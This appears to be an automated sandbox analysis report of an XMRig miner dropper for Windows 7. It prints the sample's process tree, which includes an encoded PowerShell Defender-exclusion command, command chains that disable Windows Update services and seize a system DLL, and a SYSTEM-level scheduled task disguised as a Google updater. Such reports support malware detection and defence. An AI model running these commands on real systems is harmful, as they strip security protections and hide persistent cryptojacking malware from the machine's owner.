Analysis

  • max time kernel
    300s
  • max time network
    309s
  • platform
    windows7_x64
  • resource
    win7-20220718-en
  • resource tags

    arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system
  • submitted
    09-08-2022 22:18

General

  • Target

    b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exe

  • Size

    7.3MB

  • MD5

    df35dd9a6f211651c51e99928eb21cf1

  • SHA1

    84b644f6e404c0c6eac3af7768d7d44c01dbd9bb

  • SHA256

    b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c

  • SHA512

    b6a21f19adc1a302677da6f1c8f7bcc6222b5d2edd4fb12f21c1c12a1d55aa93c8586ce25827f8c9f45d51003b5b2db106949c7791d98d9b474a10a99dcca1d6

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner payload 13 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exe
    "C:\Users\Admin\AppData\Local\Temp\b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exe"
      2⤵
      • Drops file in Drivers directory
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:240
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAcgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbABuAGMAdgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwB1ACMAPgA="
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2012
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1936
        • C:\Windows\system32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1064
        • C:\Windows\system32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1664
        • C:\Windows\system32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:548
        • C:\Windows\system32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1264
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1216
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          4⤵
          • Launches sc.exe
          PID:1360
        • C:\Windows\system32\sc.exe
          sc stop WaaSMedicSvc
          4⤵
          • Launches sc.exe
          PID:696
        • C:\Windows\system32\sc.exe
          sc stop dosvc
          4⤵
          • Launches sc.exe
          PID:1940
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
          4⤵
          • Modifies registry key
          PID:1140
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
          4⤵
          • Modifies registry key
          PID:1648
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
          4⤵
          • Modifies registry key
          PID:832
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
          4⤵
          • Modifies security service
          • Modifies registry key
          PID:1676
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:928
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
          4⤵
          • Modifies registry key
          PID:1164
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1428
        • C:\Windows\system32\sc.exe
          sc stop bits
          4⤵
          • Launches sc.exe
          PID:1604
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          4⤵
          • Launches sc.exe
          PID:1356
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          4⤵
          • Modifies registry key
          PID:1800
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          4⤵
          • Modifies registry key
          PID:2040
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          4⤵
          • Modifies registry key
          PID:1332
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          4⤵
            PID:1640
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            4⤵
              PID:1804
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
              4⤵
              • Modifies registry key
              PID:696
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
              4⤵
                PID:1036
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                4⤵
                  PID:820
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                  4⤵
                    PID:1892
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                    4⤵
                      PID:1000
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                      4⤵
                        PID:1140
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                      3⤵
                        PID:1612
                        • C:\Windows\system32\schtasks.exe
                          schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                          4⤵
                          • Creates scheduled task(s)
                          PID:2028
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                        3⤵
                          PID:1736
                          • C:\Windows\system32\schtasks.exe
                            schtasks /run /tn "GoogleUpdateTaskMachineQC"
                            4⤵
                              PID:1992
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {5490E1C8-3583-4790-8D61-09DEE4952984} S-1-5-18:NT AUTHORITY\System:Service:
                        1⤵
                        • Loads dropped DLL
                        PID:360
                        • C:\Program Files\Google\Chrome\updater.exe
                          "C:\Program Files\Google\Chrome\updater.exe"
                          2⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:900
                          • C:\Windows\System32\conhost.exe
                            "C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"
                            3⤵
                            • Drops file in Drivers directory
                            • Suspicious use of SetThreadContext
                            • Drops file in Program Files directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:816
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAcgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbABuAGMAdgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwB1ACMAPgA="
                              4⤵
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:112
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                              4⤵
                                PID:1888
                                • C:\Windows\system32\sc.exe
                                  sc stop UsoSvc
                                  5⤵
                                  • Launches sc.exe
                                  PID:1968
                                • C:\Windows\system32\sc.exe
                                  sc stop WaaSMedicSvc
                                  5⤵
                                  • Launches sc.exe
                                  PID:1540
                                • C:\Windows\system32\sc.exe
                                  sc stop wuauserv
                                  5⤵
                                  • Launches sc.exe
                                  PID:2040
                                • C:\Windows\system32\sc.exe
                                  sc stop bits
                                  5⤵
                                  • Launches sc.exe
                                  PID:1800
                                • C:\Windows\system32\sc.exe
                                  sc stop dosvc
                                  5⤵
                                  • Launches sc.exe
                                  PID:696
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1804
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1168
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                  5⤵
                                  • Modifies registry key
                                  PID:972
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1268
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1264
                                • C:\Windows\system32\takeown.exe
                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                  5⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1164
                                • C:\Windows\system32\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                  5⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:1560
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1904
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:628
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1188
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1960
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                  5⤵
                                    PID:664
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                    5⤵
                                      PID:1028
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                      5⤵
                                        PID:548
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                        5⤵
                                          PID:1376
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                          5⤵
                                            PID:1476
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                            5⤵
                                              PID:1352
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                              5⤵
                                                PID:1896
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                              4⤵
                                                PID:1976
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-ac 0
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1696
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-dc 0
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1608
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-ac 0
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:320
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-dc 0
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:900
                                              • C:\Windows\System32\conhost.exe
                                                C:\Windows\System32\conhost.exe "dcpwerxuy"
                                                4⤵
                                                  PID:1616
                                                • C:\Windows\explorer.exe
                                                  C:\Windows\explorer.exe spvkjhubdgcazo1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8eKezaNpuSO3umoNE74aPKOBJ7Z4OcaaPQIxzo8B58Gs
                                                  4⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1992

                                          Network

                                          MITRE ATT&CK Enterprise v6

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Program Files\Google\Chrome\updater.exe

                                            Filesize

                                            7.3MB

                                            MD5

                                            df35dd9a6f211651c51e99928eb21cf1

                                            SHA1

                                            84b644f6e404c0c6eac3af7768d7d44c01dbd9bb

                                            SHA256

                                            b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c

                                            SHA512

                                            b6a21f19adc1a302677da6f1c8f7bcc6222b5d2edd4fb12f21c1c12a1d55aa93c8586ce25827f8c9f45d51003b5b2db106949c7791d98d9b474a10a99dcca1d6

                                          • C:\Program Files\Google\Chrome\updater.exe

                                            Filesize

                                            7.3MB

                                            MD5

                                            df35dd9a6f211651c51e99928eb21cf1

                                            SHA1

                                            84b644f6e404c0c6eac3af7768d7d44c01dbd9bb

                                            SHA256

                                            b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c

                                            SHA512

                                            b6a21f19adc1a302677da6f1c8f7bcc6222b5d2edd4fb12f21c1c12a1d55aa93c8586ce25827f8c9f45d51003b5b2db106949c7791d98d9b474a10a99dcca1d6

                                          • C:\Windows\system32\drivers\etc\hosts

                                            Filesize

                                            2KB

                                            MD5

                                            c5227366b7a688ff23b01788718251aa

                                            SHA1

                                            9795262e79c832ba49c744fcd1b1794c0ffb5c6a

                                            SHA256

                                            789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48

                                            SHA512

                                            8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe

                                          • \Program Files\Google\Chrome\updater.exe

                                            Filesize

                                            7.3MB

                                            MD5

                                            df35dd9a6f211651c51e99928eb21cf1

                                            SHA1

                                            84b644f6e404c0c6eac3af7768d7d44c01dbd9bb

                                            SHA256

                                            b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c

                                            SHA512

                                            b6a21f19adc1a302677da6f1c8f7bcc6222b5d2edd4fb12f21c1c12a1d55aa93c8586ce25827f8c9f45d51003b5b2db106949c7791d98d9b474a10a99dcca1d6

                                          • memory/112-117-0x000007FEEDA60000-0x000007FEEE483000-memory.dmp

                                            Filesize

                                            10.1MB

                                          • memory/112-115-0x0000000000000000-mapping.dmp

                                          • memory/112-118-0x000007FEECF00000-0x000007FEEDA5D000-memory.dmp

                                            Filesize

                                            11.4MB

                                          • memory/112-119-0x0000000000964000-0x0000000000967000-memory.dmp

                                            Filesize

                                            12KB

                                          • memory/112-120-0x0000000000964000-0x0000000000967000-memory.dmp

                                            Filesize

                                            12KB

                                          • memory/112-121-0x000000000096B000-0x000000000098A000-memory.dmp

                                            Filesize

                                            124KB

                                          • memory/240-58-0x00000000001C0000-0x00000000005DE000-memory.dmp

                                            Filesize

                                            4.1MB

                                          • memory/240-62-0x000007FEFC0D1000-0x000007FEFC0D3000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/240-61-0x000000001BB30000-0x000000001BF4E000-memory.dmp

                                            Filesize

                                            4.1MB

                                          • memory/320-146-0x0000000000000000-mapping.dmp

                                          • memory/360-94-0x00000000010E0000-0x0000000001DA1000-memory.dmp

                                            Filesize

                                            12.8MB

                                          • memory/360-109-0x00000000010E0000-0x0000000001DA1000-memory.dmp

                                            Filesize

                                            12.8MB

                                          • memory/548-145-0x0000000000000000-mapping.dmp

                                          • memory/548-81-0x0000000000000000-mapping.dmp

                                          • memory/628-139-0x0000000000000000-mapping.dmp

                                          • memory/664-142-0x0000000000000000-mapping.dmp

                                          • memory/696-73-0x0000000000000000-mapping.dmp

                                          • memory/696-130-0x0000000000000000-mapping.dmp

                                          • memory/696-101-0x0000000000000000-mapping.dmp

                                          • memory/816-151-0x0000000001320000-0x0000000001326000-memory.dmp

                                            Filesize

                                            24KB

                                          • memory/820-105-0x0000000000000000-mapping.dmp

                                          • memory/832-84-0x0000000000000000-mapping.dmp

                                          • memory/900-95-0x0000000000400000-0x00000000010C1000-memory.dmp

                                            Filesize

                                            12.8MB

                                          • memory/900-110-0x0000000000400000-0x00000000010C1000-memory.dmp

                                            Filesize

                                            12.8MB

                                          • memory/900-92-0x0000000000000000-mapping.dmp

                                          • memory/900-111-0x00000000776B0000-0x0000000077859000-memory.dmp

                                            Filesize

                                            1.7MB

                                          • memory/900-97-0x0000000000400000-0x00000000010C1000-memory.dmp

                                            Filesize

                                            12.8MB

                                          • memory/900-113-0x00000000776B0000-0x0000000077859000-memory.dmp

                                            Filesize

                                            1.7MB

                                          • memory/900-96-0x00000000776B0000-0x0000000077859000-memory.dmp

                                            Filesize

                                            1.7MB

                                          • memory/900-149-0x0000000000000000-mapping.dmp

                                          • memory/900-112-0x0000000000400000-0x00000000010C1000-memory.dmp

                                            Filesize

                                            12.8MB

                                          • memory/928-85-0x0000000000000000-mapping.dmp

                                          • memory/972-133-0x0000000000000000-mapping.dmp

                                          • memory/1000-104-0x0000000000000000-mapping.dmp

                                          • memory/1028-143-0x0000000000000000-mapping.dmp

                                          • memory/1036-106-0x0000000000000000-mapping.dmp

                                          • memory/1064-72-0x0000000000000000-mapping.dmp

                                          • memory/1140-80-0x0000000000000000-mapping.dmp

                                          • memory/1140-108-0x0000000000000000-mapping.dmp

                                          • memory/1164-79-0x0000000000000000-mapping.dmp

                                          • memory/1164-136-0x0000000000000000-mapping.dmp

                                          • memory/1168-132-0x0000000000000000-mapping.dmp

                                          • memory/1188-140-0x0000000000000000-mapping.dmp

                                          • memory/1216-69-0x0000000000000000-mapping.dmp

                                          • memory/1264-135-0x0000000000000000-mapping.dmp

                                          • memory/1264-75-0x0000000000000000-mapping.dmp

                                          • memory/1268-134-0x0000000000000000-mapping.dmp

                                          • memory/1332-100-0x0000000000000000-mapping.dmp

                                          • memory/1352-150-0x0000000000000000-mapping.dmp

                                          • memory/1356-74-0x0000000000000000-mapping.dmp

                                          • memory/1360-71-0x0000000000000000-mapping.dmp

                                          • memory/1376-147-0x0000000000000000-mapping.dmp

                                          • memory/1428-86-0x0000000000000000-mapping.dmp

                                          • memory/1476-148-0x0000000000000000-mapping.dmp

                                          • memory/1540-126-0x0000000000000000-mapping.dmp

                                          • memory/1560-137-0x0000000000000000-mapping.dmp

                                          • memory/1604-76-0x0000000000000000-mapping.dmp

                                          • memory/1608-144-0x0000000000000000-mapping.dmp

                                          • memory/1612-87-0x0000000000000000-mapping.dmp

                                          • memory/1616-155-0x0000000000440000-0x0000000000446000-memory.dmp

                                            Filesize

                                            24KB

                                          • memory/1616-154-0x0000000000060000-0x0000000000067000-memory.dmp

                                            Filesize

                                            28KB

                                          • memory/1616-152-0x0000000000060000-0x0000000000067000-memory.dmp

                                            Filesize

                                            28KB

                                          • memory/1640-103-0x0000000000000000-mapping.dmp

                                          • memory/1648-83-0x0000000000000000-mapping.dmp

                                          • memory/1664-78-0x0000000000000000-mapping.dmp

                                          • memory/1676-82-0x0000000000000000-mapping.dmp

                                          • memory/1696-127-0x0000000000000000-mapping.dmp

                                          • memory/1736-88-0x0000000000000000-mapping.dmp

                                          • memory/1800-99-0x0000000000000000-mapping.dmp

                                          • memory/1800-129-0x0000000000000000-mapping.dmp

                                          • memory/1804-131-0x0000000000000000-mapping.dmp

                                          • memory/1804-102-0x0000000000000000-mapping.dmp

                                          • memory/1888-122-0x0000000000000000-mapping.dmp

                                          • memory/1892-107-0x0000000000000000-mapping.dmp

                                          • memory/1904-138-0x0000000000000000-mapping.dmp

                                          • memory/1936-70-0x0000000000000000-mapping.dmp

